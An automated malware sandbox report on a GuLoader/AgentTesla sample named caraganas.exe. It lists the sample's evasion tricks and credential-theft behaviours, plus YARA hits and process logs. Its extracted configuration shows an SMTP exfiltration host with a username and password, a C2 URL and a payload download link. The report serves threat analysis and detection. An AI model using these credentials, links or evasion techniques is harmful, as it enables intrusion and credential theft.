Play interactive tour

Edit tour

Analysis Report caraganas.exe

Overview

General Information

Sample Name:	caraganas.exe
Analysis ID:	358114
MD5:	99d875ac3341453383c9105669e14538
SHA1:	c459b8df634dc70ea2537d9588eeeb3d2b644d94
SHA256:	98bbdc74c1ff5407450d9019407d2012a08075269228497f10b9bf6e6471de42
Tags:	exeGuLoader
Infos:
Most interesting Screenshot:

Detection

AgentTesla GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected AgentTesla

Yara detected GuLoader

C2 URLs / IPs found in malware configuration

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Found evasive API chain (trying to detect sleep duration tampering with parallel thread)

Hides threads from debuggers

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Tries to load missing DLLs

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Startup

System is w10x64

caraganas.exe (PID: 6820 cmdline: 'C:\Users\user\Desktop\caraganas.exe' MD5: 99D875AC3341453383C9105669E14538)

RegAsm.exe (PID: 1724 cmdline: 'C:\Users\user\Desktop\caraganas.exe' MD5: 529695608EAFBED00ACA9E61EF333A7C)

RegAsm.exe (PID: 2916 cmdline: 'C:\Users\user\Desktop\caraganas.exe' MD5: 529695608EAFBED00ACA9E61EF333A7C)

conhost.exe (PID: 4588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "Q2TP9tlm", "URL: ": "http://8vV1Qxo32XjttpL.org", "To: ": "rzKGV@ahwhW.com", "ByHost: ": "mail.jesmar.net:587", "Password: ": "0s0uxNrAPxOSN", "From: ": "info@jesmar.net"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.601350930.000000001D7E1000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000006.00000002.601350930.000000001D7E1000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.596328627.0000000000B01000.00000040.00000001.sdmp	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
Process Memory Space: RegAsm.exe PID: 2916	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: RegAsm.exe PID: 2916	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 2916	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
Click to see the 1 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: RegAsm.exe.2916.6.memstr

Malware Configuration Extractor: Agenttesla {"Username: ": "Q2TP9tlm", "URL: ": "http://8vV1Qxo32XjttpL.org", "To: ": "rzKGV@ahwhW.com", "ByHost: ": "mail.jesmar.net:587", "Password: ": "0s0uxNrAPxOSN", "From: ": "info@jesmar.net"}

Multi AV Scanner detection for submitted file

Show sources

Source: caraganas.exe	Metadefender: Detection: 18%			Perma Link
Source: caraganas.exe	ReversingLabs: Detection: 10%

Compliance:

Uses 32bit PE files

Show sources

Source: caraganas.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Uses new MSVCR Dlls

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Uses secure TLS version for HTTPS connections

Show sources

Source: unknown

HTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.6:49731 version: TLS 1.2

Binary contains paths to debug symbols

Show sources

Source:

Binary string: mscorrc.pdb source: RegAsm.exe, 00000006.00000002.603402260.0000000020130000.00000002.00000001.sdmp

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: http://8vV1Qxo32XjttpL.org

Source: Joe Sandbox View

IP Address: 142.250.186.33 142.250.186.33

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown

DNS traffic detected: queries for: doc-08-58-docs.googleusercontent.com

Source: RegAsm.exe, 00000006.00000002.601350930.000000001D7E1000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: RegAsm.exe, 00000006.00000002.601670799.000000001D905000.00000004.00000001.sdmp, RegAsm.exe, 00000006.00000002.601708769.000000001D916000.00000004.00000001.sdmp	String found in binary or memory: http://8vV1Qxo32XjttpL.org
Source: RegAsm.exe, 00000006.00000002.601350930.000000001D7E1000.00000004.00000001.sdmp	String found in binary or memory: http://DPtQpK.com
Source: RegAsm.exe, 00000006.00000002.601350930.000000001D7E1000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: RegAsm.exe, 00000006.00000002.601670799.000000001D905000.00000004.00000001.sdmp	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: RegAsm.exe, 00000006.00000002.601670799.000000001D905000.00000004.00000001.sdmp	String found in binary or memory: http://cps.letsencrypt.org0
Source: RegAsm.exe, 00000006.00000002.601670799.000000001D905000.00000004.00000001.sdmp	String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: RegAsm.exe, 00000006.00000002.601670799.000000001D905000.00000004.00000001.sdmp	String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: RegAsm.exe, 00000006.00000002.601670799.000000001D905000.00000004.00000001.sdmp	String found in binary or memory: http://r3.i.lencr.org/06
Source: RegAsm.exe, 00000006.00000002.601670799.000000001D905000.00000004.00000001.sdmp	String found in binary or memory: http://r3.o.lencr.org0
Source: RegAsm.exe	String found in binary or memory: https://drive.google.com/uc?export=download&id=1QhM38kCW0J9xSmyfm4mPT5q5H_nh_JiH
Source: RegAsm.exe, 00000006.00000002.601350930.000000001D7E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443

Source: unknown

HTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.6:49731 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Source: caraganas.exe, 00000001.00000002.412969250.000000000073A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_00B05543 NtProtectVirtualMemory,	6_2_00B05543
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_00B0592A NtSetInformationThread,	6_2_00B0592A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_00B059BB NtSetInformationThread,	6_2_00B059BB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_00B05ABA NtSetInformationThread,	6_2_00B05ABA
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_00B05A96 NtSetInformationThread,	6_2_00B05A96
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_00B05AFB NtSetInformationThread,	6_2_00B05AFB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_00B05AC5 NtSetInformationThread,	6_2_00B05AC5
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_00B05A0B NtSetInformationThread,	6_2_00B05A0B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_00B05A7E NtSetInformationThread,	6_2_00B05A7E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_00B05B96 NtSetInformationThread,	6_2_00B05B96
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_00B05B82 NtSetInformationThread,	6_2_00B05B82
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_00B05BCB NtSetInformationThread,	6_2_00B05BCB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_00B05B12 NtSetInformationThread,	6_2_00B05B12
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_00B05B46 NtSetInformationThread,	6_2_00B05B46
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_00B05C2A NtSetInformationThread,	6_2_00B05C2A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_00B05C5C NtSetInformationThread,	6_2_00B05C5C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_1D5CB0BA NtQuerySystemInformation,	6_2_1D5CB0BA
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_1D5CB089 NtQuerySystemInformation,	6_2_1D5CB089

Source: C:\Users\user\Desktop\caraganas.exe	Code function: 1_2_00401A36	1_2_00401A36
Source: C:\Users\user\Desktop\caraganas.exe	Code function: 1_2_004019E9	1_2_004019E9
Source: C:\Users\user\Desktop\caraganas.exe	Code function: 1_2_004017F6	1_2_004017F6
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_00FAE1A8	6_2_00FAE1A8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_00FA75B0	6_2_00FA75B0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_00FAC9D3	6_2_00FAC9D3
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_00FA1B00	6_2_00FA1B00
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_00FAAE80	6_2_00FAAE80
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_00FA1BD8	6_2_00FA1BD8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_1F99ED18	6_2_1F99ED18
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_1F99A698	6_2_1F99A698
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_1F996840	6_2_1F996840

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Section loaded: sfc.dll

Jump to behavior

Source: caraganas.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/1@2/1

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_1D5CAF3E AdjustTokenPrivileges,		6_2_1D5CAF3E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_1D5CAF07 AdjustTokenPrivileges,		6_2_1D5CAF07

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4588:120:WilError_01

Source: C:\Users\user\Desktop\caraganas.exe

File created: C:\Users\user\AppData\Local\Temp\~DFF94D9771C1CF7909.TMP

Jump to behavior

Source: caraganas.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\caraganas.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\caraganas.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: caraganas.exe	Metadefender: Detection: 18%
Source: caraganas.exe	ReversingLabs: Detection: 10%

Source: unknown	Process created: C:\Users\user\Desktop\caraganas.exe 'C:\Users\user\Desktop\caraganas.exe'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\caraganas.exe'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\caraganas.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\caraganas.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\caraganas.exe'	Jump to behavior
Source: C:\Users\user\Desktop\caraganas.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\caraganas.exe'	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Source:

Binary string: mscorrc.pdb source: RegAsm.exe, 00000006.00000002.603402260.0000000020130000.00000002.00000001.sdmp

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: 00000006.00000002.596328627.0000000000B01000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2916, type: MEMORY

Source: C:\Users\user\Desktop\caraganas.exe	Code function: 1_2_00407A44 push edx; ret	1_2_00407A4B
Source: C:\Users\user\Desktop\caraganas.exe	Code function: 1_2_0040AE39 push edi; retn 0004h	1_2_0040C0C1
Source: C:\Users\user\Desktop\caraganas.exe	Code function: 1_2_0040BBD4 push edi; retn 0004h	1_2_0040C0C1
Source: C:\Users\user\Desktop\caraganas.exe	Code function: 1_2_02324E49 push ebx; ret	1_2_02324E4A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_1F997648 push ebx; ret	6_2_1F997672
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_1F99C643 push esp; iretd	6_2_1F99C649
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_1FFD41C9 push cs; retf	6_2_1FFD41DF
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_1FFD4155 push cs; retf	6_2_1FFD416B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_1FFD40E1 push cs; retf	6_2_1FFD40F7

Hooking and other Techniques for Hiding and Protection:

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\caraganas.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
